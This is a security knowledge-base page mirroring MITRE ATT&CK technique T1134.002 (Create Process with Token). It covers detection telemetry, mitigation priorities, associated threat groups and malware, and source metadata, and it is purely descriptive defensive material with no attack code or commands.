T1134.002: Create Process with Token

Create Process with Token is a Windows privilege-escalation and stealth behavior where an adversary starts a new process under another user’s security context. For leaders, the practical risk is that access controls and accountability can be weakened if attackers can obtain credentials, impersonation privileges, or reusable tokens and then run tools as a more trusted user.

Executive priority

Prioritize this where Windows administrative access, privileged service accounts, or shared operational workstations are business-critical. The key governance question is whether privileged account use is tightly managed and auditable enough to explain who launched sensitive processes during an incident. This technique also matters for incident response because it can blur user attribution and may appear in chains with broader Access Token Manipulation behavior.

Technical view

This is a Windows sub-technique of Access Token Manipulation under stealth and privilege-escalation. MITRE does not provide official detection text for this object, but the supplied relationship identifies DET0456 as a behavior-chain detection strategy for T1134.002. SOC and detection teams should validate whether they can correlate process creation with the creating user, resulting security context, logon/session context, and unusual use of mechanisms such as CreateProcessWithTokenW or runas. Investigations should also consider related token activity, especially Token Impersonation/Theft or Make and Impersonate Token when local evidence supports that sequence.

Likely telemetry

Windows process creation events with parent/child process, command line, user, integrity level, and logon/session identifiers
Authentication and logon/session records showing the account context used by the resulting process
Privilege-use and account-management audit events relevant to impersonation or privileged execution
Endpoint detection telemetry that records process token/security context changes or suspicious process ancestry
Administrative tool usage evidence, including legitimate runas-style activity where available

Detection direction

Validate behavior-chain analytics rather than relying on a single process name or API reference, because legitimate administration can also create processes under alternate credentials.
Tune for mismatches between the initiating process/user and the resulting process security context, especially when privileged or service accounts are involved.
Correlate with prior token access, token duplication, or impersonation indicators when available, since the ATT&CK object notes this technique may be used with other Access Token Manipulation sub-techniques.
Account for false positives from approved administration, help desk workflows, software deployment, and scripted maintenance that intentionally use alternate credentials.
Confirm telemetry retention is sufficient for IR reconstruction; without process, user, and logon-session linkage, attribution and scoping will be weak.

Mitigation priorities

Implement User Account Management controls: enforce least privilege, remove unnecessary accounts, and ensure account lifecycle processes reduce opportunities for unauthorized token use.
Strengthen Privileged Account Management: restrict where privileged accounts can log on, limit standing privileges, and monitor privileged account usage for accountability.
Review which users and services require impersonation or privileged execution rights on Windows systems and reduce them where business need is not clear.
Document approved administrative workflows that create processes under alternate credentials so SOC teams can distinguish expected activity from suspicious behavior.
Use incident response playbooks that treat suspicious token-based process creation as a potential privilege-escalation event requiring account, host, and process-tree scoping.

Analyst notes and limits

ATT&CK relationships show use by multiple groups and software entries, including Turla, Lazarus Group, Bankshot, Azorult, KONNI, Empire, PoshC2, ZxShell, Aria-body, REvil, PipeMon, WhisperGate, and TONESHELL. These relationships indicate the behavior is relevant across both malware and post-exploitation tooling, but they should not be read as evidence of current activity in any specific environment.

Official MITRE detection guidance is not provided for this object. The assessment is limited to the supplied ATT&CK fields, external reference to Microsoft runas documentation, and listed relationships. Local Windows audit policy, EDR visibility, account model, and administrative workflows are required to determine real detection coverage and risk.

Official MITRE ATT&CK definition

Create Process with Token

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.[1]

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via Token Impersonation/Theft or created via Make and Impersonate Token before being used to create a process.

While this technique is distinct from Token Impersonation/Theft, the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Filter related techniques 1 rows

Domain	ID	Name	Relationship / procedure
Enterprise	T1134	Access Token Manipulation	This object subtechnique of Access Token Manipulation.

Associated objects

Groups, software, and campaigns

G0010: Turla

Turla is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. Turla is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as Uroburos.[1][2][3][4][5]

G0032: Lazarus Group

Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). [1] [2] Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[3]

North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.[4][5][6]

S0344: Azorult

Azorult is a commercial Trojan that is used to steal information from compromised hosts. Azorult has been observed in the wild as early as 2016. In July 2018, Azorult was seen used in a spearphishing campaign against targets in North America. Azorult has been seen used for cryptocurrency theft. [1][2]

Windows

S0501: PipeMon

PipeMon is a multi-stage modular backdoor used by Winnti Group.[1]

Windows

S0378: PoshC2

PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[1]

WindowsLinuxmacOS

S0456: Aria-body

Aria-body is a custom backdoor that has been used by Naikon since approximately 2017.[1]

Windows

S0496: REvil

REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[1][2][3]

Windows

S0412: ZxShell

ZxShell is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.[1][2]

Windows

S0689: WhisperGate

WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.[1][2][3]

Windows

S0356: KONNI

KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.[1][2][3][4][5]

Windows

S0239: Bankshot

Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector. [1]

Windows

S1239: TONESHELL

TONESHELL is a custom backdoor that has been used since at least Q1 2021.[1] TONESHELL malware has previously been leveraged by Chinese affiliated actors identified as Mustang Panda.[2][3]

Windows

S0363: Empire

Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]

LinuxmacOSWindows

Relationship explorer

All related ATT&CK context

Mitigations

Mitigation direction

M1026: Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.This mitigation can be implemented through the following measures:

Account Permissions and Roles:

- Implement RBAC and least privilege principles to allocate permissions securely. - Use tools like Active Directory Group Policies to enforce access restrictions.

Credential Security:

- Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials. - Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).

Multi-Factor Authentication (MFA):

- Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.

Privileged Access Management (PAM):

- Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.

Auditing and Monitoring:

- Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.

Just-In-Time Access:

- Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.

*Tools for Implementation*

Privileged Access Management (PAM):

- CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.

Credential Management:

- Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.

Multi-Factor Authentication:

- Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.

Linux Privilege Management:

- sudo configuration, SELinux, AppArmor.

Just-In-Time Access:

- Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.

M1018: User Account Management

User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies. This mitigation can be implemented through the following measures:

Enforcing the Principle of Least Privilege

- Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted. - Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions.

Implementing Strong Password Policies

- Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse. - Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks.

Managing Dormant and Orphaned Accounts

- Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits. - Use Case: Eliminates dormant accounts that could be exploited by attackers.

Account Lockout Policies

- Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes. - Use Case: Mitigates automated attack techniques that rely on repeated login attempts.

Multi-Factor Authentication (MFA) for High-Risk Accounts

- Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics. - Use Case: Prevents unauthorized access, even if credentials are stolen.

Restricting Interactive Logins

- Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions. - Use Case: Protects sensitive accounts from misuse or exploitation.

*Tools for Implementation*

Built-in Tools:

- Microsoft Active Directory (AD): Centralized account management and RBAC enforcement. - Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.

Identity and Access Management (IAM) Tools:

- Okta: Centralized user provisioning, MFA, and SSO integration. - Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.

Privileged Account Management (PAM): - CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 2.0
Created: Feb 18, 2020, 16:48 UTC (UTC+00:00)
Modified: May 12, 2026, 15:12 UTC (UTC+00:00)
Raw hash: acb33dc849fba126...

Imported snapshots across ATT&CK releases (1)

Release	Bundle imported	Object version	Modified	Status	Raw hash
19.1	May 18, 2026, 07:08 UTC (UTC+00:00)	2.0	May 12, 2026, 15:12 UTC (UTC+00:00)	Current bundle	`acb33dc849fb…`

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1]
Microsoft RunAs

Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.
Open source URL
[2]
mitre-attack T1134.002
Open source URL

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use

Analyst context for executives and security teams

Executive priority

Technical view

Likely telemetry

Detection direction

Mitigation priorities

Create Process with Token

How security teams should use this page

Related techniques

Groups, software, and campaigns

All related ATT&CK context

Mitigation direction

Object version and sync metadata

Mirrored ATT&CK source object

External references and citations